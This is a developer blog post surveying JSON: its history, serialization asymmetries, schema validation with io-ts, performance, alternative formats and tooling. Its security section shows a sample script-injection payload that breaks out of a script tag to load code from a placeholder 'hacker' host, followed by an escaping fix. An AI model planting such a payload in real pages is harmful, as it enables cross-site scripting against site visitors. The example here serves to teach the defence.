JSON, JSON, JSON

stereobooster - Sep 23 '18 - - Dev Community

All things about JSON.

Begining

JSON - born out of web platform limitation and a bit of creativity. There was XMLHttpRequest to do request to the server without the need to do full reload, but XML is "heavy" on the wire, so Douglas Crockford thought of clever trick - we can use JavaScript Object Notation and eval to pass data from the server to the client or vice versa in easy way. But it is not safe to execute arbitrary code (eval) especially if it comes from 3rd party source. So next step was to standardize it and implement a specific parser for it. Later it becomes standard for all browsers and now we can use it as JSON.parse.

limitation

Taking into account how it was born it comes with some limitations

Asymetric encoding/decoding

You know how JS tries to pretend that type errors doesn't exist and tries just coerce at any cost even if doesn't make much sense. This means that x == JSON.parse(JSON.stringify(x)) doesn't always hold true. For example:

  • Date will be turned in string representation, and after decoding it will stay a string
  • Map, WeakMap, Set, WeakSet will be turned in "{}" - it will lose contents and type
  • BigInt for a change throws TypeError: Do not know how to serialize a BigInt
  • a function will be converted to undefined
  • undefined will be converted to undefined
  • ES6 class and new function(){} will be converted into a representation of a plain object, but will lose type

Solution: One of possible solutions here is to use static type systems like TypeScript or Flow to prevent asymmetric types:

// inspired by https://github.com/tildeio/ts-std/blob/master/src/json.ts
export type JSONValue =
  | string
  | number
  | boolean
  | null
  | JSONObject
  | JSONArray;
type JSONObject = {[key: string]: JSONValue};
type JSONArray = Array<JSONValue>;

export const symetricStringify = (x: JSONValue) => JSON.stringify(x);
Enter fullscreen mode Exit fullscreen mode

Though it will not save us from TypeError: Converting circular structure to JSON, but will get to it later.

Security: script injection

If you use JSON as a way to pass data from the server to the client inside HTML, for example, the initial value for Redux store in case of server-side rendering or gon in Ruby, be aware that there a risk of script injection attack

<script>
  var data = {user_input: "</script><script src=http://hacker/script.js>"}
</script>
Enter fullscreen mode Exit fullscreen mode

Solution: escape JSON before passing it to HTML

const UNSAFE_CHARS_REGEXP = /[<>\/\u2028\u2029]/g;
// Mapping of unsafe HTML and invalid JavaScript line terminator chars to their
// Unicode char counterparts which are safe to use in JavaScript strings.
const ESCAPED_CHARS = {
  "<": "\\u003C",
  ">": "\\u003E",
  "/": "\\u002F",
  "\u2028": "\\u2028",
  "\u2029": "\\u2029"
};
const escapeUnsafeChars = unsafeChar => ESCAPED_CHARS[unsafeChar];
const escape = str => str.replace(UNSAFE_CHARS_REGEXP, escapeUnsafeChars);
export const safeStringify = (x) => escape(JSON.stringify(x));
Enter fullscreen mode Exit fullscreen mode

Side note: collection of JSON implementation vulnerabilities

Lack of schema

JSON is schemaless - it makes sense because JS is dynamically typed. But this means that you need to verify shape (types) yourself JSON.parse won't do it for you.

Solution: I wrote about this problem before - use IO validation

Side note: there are also other solutions, like JSON API, Swagger, and GraphQL.

Lack of schema and serializer/parser

Having a schema for parser can solve the issue with asymmetry for Date. If we know that we expect Date at some place we can use string representation to create JS Date out of it.

Having a schema for serializer can solve issue for BigInt, Map, WeakMap, Set, WeakSet, ES6 classes and new function(){}. We can provide specific serializer/parser for each type.

import * as t from 'io-ts'

const DateFromString = new t.Type<Date, string>(
  'DateFromString',
  (m): m is Date => m instanceof Date,
  (m, c) =>
    t.string.validate(m, c).chain(s => {
      const d = new Date(s)
      return isNaN(d.getTime()) ? t.failure(s, c) : t.success(d)
    }),
  a => a.toISOString()
)
Enter fullscreen mode Exit fullscreen mode

Side note: see also this proposal

Lack of schema and performance

Having a schema can improve the performance of parser. For example, see jitson and FAD.js

Side note: see also fast-json-stringify

Stream parser/serializer

When JSON was invented nobody thought about using it for gigabytes of data. If you want to do something like this take a look at some stream parser.

Also, you can use a JSON stream to improve UX for slow backend - see oboejs.

Beyond JSON

uneval

If you want to serialize actual JS code and preserve types, references and cyclic structures JSON will be not enough. You will need "uneval". Checkout some of those:

Other "variations to this tune":

  • LJSON - JSON extended with pure functions
  • serialize-javascript - Serialize JavaScript to a superset of JSON that includes regular expressions, dates and functions
  • arson - Efficient encoder and decoder for arbitrary objects
  • ResurrectJS preserves object behavior (prototypes) and reference circularity with a special JSON encoding
  • serializr - Serialize and deserialize complex object graphs to and from JSON and Javascript classes

As a configuration file

JSON was invented to transmit data, not for storing configuration. Yet people use it for configuration because this is an easy option.

JSON lacks comments, requires quotes around keys, prohibits coma at the end of array or dictionary, requires paired {} and []. There is no real solution for this excepts use another format, like JSON5 or YAML or TOML.

Binary data

JSON is more compact than XML, yet not the most compact. Binary formats even more effective. Checkout MessagePack.

Side note: GraphQL is not tied to JSON, so you can use MessagePack with GraphQL.

Binary data and schema

Having binary format with schema allows doing some crazy optimization, like random access or zero-copy. Check out Cap-n-Proto.

Query language

JSON (as anything JS related) is super popular, so people need to work with it more and more and started to build tools around it, like JSONPath and jq.

Did I miss something?

Leave a comment if I missed something. Thanks for reading.


Follow me on twitter and github.

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .